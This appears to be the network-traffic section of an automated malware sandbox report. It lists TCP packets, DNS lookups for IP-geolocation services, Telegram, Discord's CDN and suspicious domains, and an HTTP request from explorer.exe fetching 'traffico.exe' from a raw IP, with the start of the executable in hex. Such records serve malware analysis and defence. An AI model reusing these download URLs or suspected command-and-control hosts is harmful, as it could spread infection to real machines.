Nov 18, 2023 10:02:37.736830950 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.736836910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736850023 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.736854076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736871004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736877918 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.736888885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736905098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736918926 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.736922979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736941099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736947060 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.736958027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.736999035 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.737004995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737020016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737035990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737046003 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.737051964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737068892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737080097 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.737085104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737102032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737118959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737134933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737150908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737154007 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.737166882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737180948 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.737184048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737200022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737216949 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.737217903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737235069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737246990 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.737260103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737277031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737293959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.737302065 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.737323046 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.737500906 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.739097118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.739146948 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.739603996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.739622116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.739639044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.739656925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.739681959 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.739707947 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.739725113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.739742041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.739759922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.739785910 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.739790916 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.739808083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.739824057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.739841938 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.739869118 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.740304947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.740322113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.740413904 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.741126060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.741179943 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.741197109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.741226912 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.741411924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.741427898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.741444111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.741451979 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.741461992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.741486073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.741571903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.741615057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.741620064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.741786957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.741825104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.741866112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.741997004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742013931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742038012 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.742108107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742124081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742141962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742158890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742165089 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.742176056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742182970 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.742192984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742208958 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742224932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.742225885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742250919 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.742271900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742316008 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.742328882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742350101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742367029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742407084 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.742690086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742733955 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.742810011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742827892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742845058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742861986 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742878914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742887974 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.742896080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742913008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742918015 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.742929935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742940903 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.742949009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.742989063 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.743149042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743166924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743185043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743208885 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.743221045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.743248940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743267059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743283987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743311882 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.743455887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743473053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743489981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743506908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743514061 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.743539095 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.743791103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743808985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743877888 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.743880033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743900061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.743922949 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.743988991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744005919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744023085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744040966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744049072 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.744057894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744076967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744086981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.744093895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744105101 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.744111061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744127989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744143009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.744143963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744162083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744169950 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.744179010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744220972 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.744818926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744837046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744863987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744879007 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.744880915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744898081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744904041 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.744915962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744934082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744951963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.744959116 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.744980097 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.745387077 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745404959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745420933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745436907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745444059 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.745452881 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745480061 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.745501041 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.745646954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745662928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745680094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745695114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745702982 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.745712042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745728016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745739937 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.745743990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745760918 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745769024 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.745779037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745796919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745803118 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.745812893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745829105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745835066 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.745846033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745862961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745878935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745888948 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.745897055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745913982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745913982 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.745929956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745939016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.745946884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745965004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745980978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.745982885 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.745997906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746007919 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.746012926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746030092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746042013 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.746046066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746062040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746078968 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746094942 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.746098042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746112108 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.746119022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746136904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746140957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.746154070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746169090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746186018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746191025 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.746202946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746215105 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.746220112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746237040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746251106 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.746253967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.746282101 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.748215914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.748234987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.748260975 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.748275995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.748294115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.748320103 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.752373934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.752393007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.752440929 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.752624989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.752670050 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.752693892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.752712011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.752729893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.752774000 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.752983093 CET	80	49744	194.49.94.120	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 18, 2023 10:01:57.765944958 CET	192.168.2.4	1.1.1.1	0xf465	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:28.742089033 CET	192.168.2.4	1.1.1.1	0x707f	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:31.206433058 CET	192.168.2.4	1.1.1.1	0x9b4e	Standard query (0)	central-cee-doja.ru	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:37.459661007 CET	192.168.2.4	1.1.1.1	0xdba4	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:38.441677094 CET	192.168.2.4	1.1.1.1	0x76eb	Standard query (0)	objects.githubusercontent.com	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:44.756649971 CET	192.168.2.4	1.1.1.1	0xfddc	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:48.291160107 CET	192.168.2.4	1.1.1.1	0xa72e	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:53.929836035 CET	192.168.2.4	1.1.1.1	0xb2c0	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:03:01.948016882 CET	192.168.2.4	1.1.1.1	0x29c3	Standard query (0)	trecube.com	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:03:07.647931099 CET	192.168.2.4	1.1.1.1	0x17bf	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:03:24.625072002 CET	192.168.2.4	1.1.1.1	0x3b45	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 18, 2023 10:01:57.918267965 CET	1.1.1.1	192.168.2.4	0xf465	No error (0)	ipinfo.io	34.117.59.81	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:28.896692991 CET	1.1.1.1	192.168.2.4	0x707f	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:31.603957891 CET	1.1.1.1	192.168.2.4	0x9b4e	No error (0)	central-cee-doja.ru	104.21.89.193	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:31.603957891 CET	1.1.1.1	192.168.2.4	0x9b4e	No error (0)	central-cee-doja.ru	172.67.164.142	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:37.620738029 CET	1.1.1.1	192.168.2.4	0xdba4	No error (0)	github.com	20.29.134.23	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:38.593677044 CET	1.1.1.1	192.168.2.4	0x76eb	No error (0)	objects.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:38.593677044 CET	1.1.1.1	192.168.2.4	0x76eb	No error (0)	objects.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:38.593677044 CET	1.1.1.1	192.168.2.4	0x76eb	No error (0)	objects.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:38.593677044 CET	1.1.1.1	192.168.2.4	0x76eb	No error (0)	objects.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:44.913703918 CET	1.1.1.1	192.168.2.4	0xfddc	No error (0)	ipwho.is	147.135.36.89	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:48.443991899 CET	1.1.1.1	192.168.2.4	0xa72e	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:54.081970930 CET	1.1.1.1	192.168.2.4	0xb2c0	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:54.081970930 CET	1.1.1.1	192.168.2.4	0xb2c0	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:54.081970930 CET	1.1.1.1	192.168.2.4	0xb2c0	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:54.081970930 CET	1.1.1.1	192.168.2.4	0xb2c0	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:02:54.081970930 CET	1.1.1.1	192.168.2.4	0xb2c0	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:03:02.109569073 CET	1.1.1.1	192.168.2.4	0x29c3	No error (0)	trecube.com	104.21.35.168	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:03:02.109569073 CET	1.1.1.1	192.168.2.4	0x29c3	No error (0)	trecube.com	172.67.177.174	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:03:07.799604893 CET	1.1.1.1	192.168.2.4	0x17bf	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Nov 18, 2023 10:03:24.777710915 CET	1.1.1.1	192.168.2.4	0x3b45	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
100	194.49.94.145	80	192.168.2.4	49741	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:30.301103115 CET	1031	OUT	GET /traffico.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 194.49.94.145
Nov 18, 2023 10:02:30.600006104 CET	1036	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:30 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Thu, 16 Nov 2023 16:34:23 GMT ETag: "6ed14-60a4797a219c1" Accept-Ranges: bytes Content-Length: 453908 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c d0 03 7e 58 b1 6d 2d 58 b1 6d 2d 58 b1 6d 2d 46 e3 f8 2d 4c b1 6d 2d 46 e3 ee 2d 01 b1 6d 2d 46 e3 e9 2d 7f b1 6d 2d 9b be 30 2d 5b b1 6d 2d 58 b1 6c 2d 09 b1 6d 2d 51 c9 e9 2d 59 b1 6d 2d 51 c9 fc 2d 59 b1 6d 2d 52 69 63 68 58 b1 6d 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 68 44 56 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 10 01 00 00 b8 05 00 00 00 00 00 5a 50 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 07 00 00 04 00 00 f1 7a 07 00 03 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 29 e6 06 00 14 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3c cc 06 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df df 00 00 00 10 00 00 00 e0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 5a 2e 00 00 00 f0 00 00 00 30 00 00 00 e4 00 00 